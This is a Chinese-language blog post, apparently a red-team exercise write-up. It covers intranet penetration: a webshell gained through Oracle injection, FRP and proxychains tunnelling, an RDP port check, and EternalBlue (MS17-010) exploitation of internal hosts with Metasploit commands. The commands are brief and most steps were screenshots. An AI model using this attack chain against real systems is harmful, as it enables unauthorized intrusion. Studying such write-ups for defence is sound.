记一次内网ms_17-010的使用

admin 2022年5月16日09:28:59安全文章评论9 views1128字阅读3分45秒阅读模式
       最近一直在打HW。闲暇时间也没有了,因此最近很少发文,后期恢复正常了就会持续发文了。各位粉丝不要取关啊。

一、通过上传直接拿到webshell

前台通过oracle注入进入拿到后台管理员密码,然后进入后台直接上传拿到webshell。通过天蝎上传frp,成功搭建内网隧道。

0x01 连接天蝎

使用天蝎进行连接,有时候冰蝎的流量会被识别,因此天蝎也是一个不错的选择。

记一次内网ms_17-010的使用

0x02 查看3389端口

REG query "HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v PortNumber set /a Port=0x8f1

记一次内网ms_17-010的使用

0x03 搭建FRP

记一次内网ms_17-010的使用

二、使用远程桌面登录

0x01 配置proxifier

(1):设置代理服务器

记一次内网ms_17-010的使用

(2):配置proxifier

记一次内网ms_17-010的使用

0x02 使用远程桌面进行登录

记一次内网ms_17-010的使用

记一次内网ms_17-010的使用

登录成功。

0x03 使用工具进行扫描

记一次内网ms_17-010的使用

发现5台主机存在ms17_010漏洞。

0x04 配置proxychains

vi /etc/proxychains.conf

记一次内网ms_17-010的使用

记一次内网ms_17-010的使用

0x05 使用proxychains代理msf进行利用

proxychains4 msfconsole

记一次内网ms_17-010的使用

三、使用永恒之蓝进行利用

0x01 使用MSF获取win2008shell

(1):寻找payload

search ms17-010use 2options

记一次内网ms_17-010的使用

记一次内网ms_17-010的使用

(2):设置目标主机

set rhost 192.168.0.104

记一次内网ms_17-010的使用

(3):进行攻击

run

记一次内网ms_17-010的使用

0x02 使用MSF获取win7shell

(1):设置目标IP

set rhost 192.168.10.38

记一次内网ms_17-010的使用

(2):进行攻击

run

记一次内网ms_17-010的使用

   关于ms_17-010的使用方法,还可以使用NSA进行利用,上面的windows Server 2008使用MSF没有利用成功,通过NSA可以利用成功。大家可以参考下面这篇文章进行学习。

https://mp.weixin.qq.com/s/ck46QIT1uixEhNqdv1t25Q

记一次内网ms_17-010的使用

原文始发于微信公众号(想走安全的小白):记一次内网ms_17-010的使用

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月16日09:28:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  记一次内网ms_17-010的使用 http://cn-sec.com/archives/886187.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: